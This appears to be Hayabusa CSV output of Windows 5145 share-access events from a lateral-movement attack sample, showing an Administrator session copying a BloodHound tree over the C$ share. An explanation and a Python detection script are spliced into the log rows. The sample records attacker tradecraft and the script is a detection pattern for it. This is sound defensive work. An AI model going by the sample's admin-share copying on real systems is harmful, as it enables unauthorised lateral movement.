0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
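Each 5145 row above is only `info`, emitted by a Hayabusa rule that ships as non-default because one share access on its own means little. What makes this sample (EVTX-ATTACK-SAMPLES, LM_5145_Remote_FileCopy) readable as lateral movement is the aggregate: a single logon ID (LID 0xfc635), a single source IP (10.0.2.15), the hidden C$ share, and dozens of distinct directories touched within roughly 200 milliseconds, which is the footprint of a recursive copy to or from an admin share rather than a person browsing in Explorer. The Python below is an added example, not Hayabusa's own code and not part of the sample set: it parses rows in the CSV shape shown on this page, splits the ` | `-delimited Details cell, and rolls 5145 events up into one finding per (host, user, source IP, LID, share). The sample rows are constructed from the pattern above with abbreviated paths, and the thresholds (five distinct paths inside a two-second window) are assumptions to tune against a real baseline.

```python
"""Roll Hayabusa 5145 'Network Share File Access' rows up into one remote-file-copy finding.

Added example; not part of Hayabusa or of the EVTX-ATTACK-SAMPLES set. Input is the
Hayabusa CSV layout shown on this page (Details is a ' | '-separated list of 'Key: Value'
pairs). The thresholds and the sample rows are assumptions.
"""
import csv
import io
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample modelled on the rows above: six paths over \\*\C$ from one logon
# (LID 0xfc635) within 40 ms, plus two rows that must not be flagged. Paths abbreviated.
SAMPLE_CSV = r"""Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/5145_NetworkShareFileAccess.yml,LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/5145_NetworkShareFileAccess.yml,LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/5145_NetworkShareFileAccess.yml,LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/5145_NetworkShareFileAccess.yml,LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/5145_NetworkShareFileAccess.yml,LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/5145_NetworkShareFileAccess.yml,LM_5145_Remote_FileCopy.evtx
2019-03-18 22:10:01.000 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: svc_backup | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\report.txt | IP Addr: 10.0.2.40 | LID: 0x8a112,rules/5145_NetworkShareFileAccess.yml,constructed.evtx
2019-03-18 22:15:30.000 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: user02 | Share Name: \\*\Public | Share Path: \??\C:\Users\Public | Path: notes.txt | IP Addr: 10.0.2.41 | LID: 0x9b001,rules/5145_NetworkShareFileAccess.yml,constructed.evtx
"""


def parse_details(details):
    """Split a Hayabusa Details cell into a dict. Partition on the first ': ' so a value
    such as '\\??\\C:\\' keeps its own colon."""
    fields = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def parse_timestamp(ts):
    """Hayabusa timestamps look like '2019-03-18 23:23:24.618 +09:00'."""
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f %z")


def load_rows(csv_text):
    return list(csv.DictReader(io.StringIO(csv_text)))


def common_dir(paths):
    """Longest common directory prefix, component-wise, so 'env-paths' and 'exenv'
    do not collapse into a misleading character prefix 'e'."""
    split = [p.split("\\") for p in paths]
    common = []
    for column in zip(*split):
        if any(c != column[0] for c in column):
            break
        common.append(column[0])
    return "\\".join(common)


def find_share_copy_bursts(rows, min_paths=5, window=timedelta(seconds=2)):
    """Group 5145 rows on hidden ($) shares by (host, user, source IP, logon ID, share) and
    report each group whose distinct-path count inside any `window` reaches `min_paths`.
    Both thresholds are assumptions for this example."""
    groups = defaultdict(list)
    for row in rows:
        if row["EventID"] != "5145":
            continue
        d = parse_details(row["Details"])
        share = d.get("Share Name", "")
        if not share.endswith("$"):  # \\*\C$, \\*\ADMIN$, ...; ordinary shares are out of scope here
            continue
        key = (row["Computer"], d.get("User", ""), d.get("IP Addr", ""), d.get("LID", ""), share)
        groups[key].append((parse_timestamp(row["Timestamp"]), d.get("Path", "")))

    findings = []
    for (host, user, ip, lid, share), events in groups.items():
        events.sort(key=lambda e: e[0])
        best_paths, best_span, start = set(), None, 0
        for end, (t_end, _) in enumerate(events):
            while t_end - events[start][0] > window:  # slide the window's left edge forward
                start += 1
            paths = {p for _, p in events[start:end + 1]}
            if len(paths) > len(best_paths):
                best_paths, best_span = paths, (events[start][0], t_end)
        if len(best_paths) >= min_paths:
            findings.append({
                "computer": host, "user": user, "ip": ip, "lid": lid, "share": share,
                "distinct_paths": len(best_paths),
                "first": best_span[0].isoformat(), "last": best_span[1].isoformat(),
                "common_dir": common_dir(best_paths),
            })
    return findings


if __name__ == "__main__":
    print(json.dumps(find_share_copy_bursts(load_rows(SAMPLE_CSV)), indent=2))
```

The LID in the finding is the pivot: the matching 4624 on the same host carries the logon type (3 for network) and the authentication package for that session, which tells you whether the Administrator credential arrived as NTLM or Kerberos and from which workstation name. The common directory prefix is what an analyst actually reports (one tree copied), rather than ninety individual rows.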
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
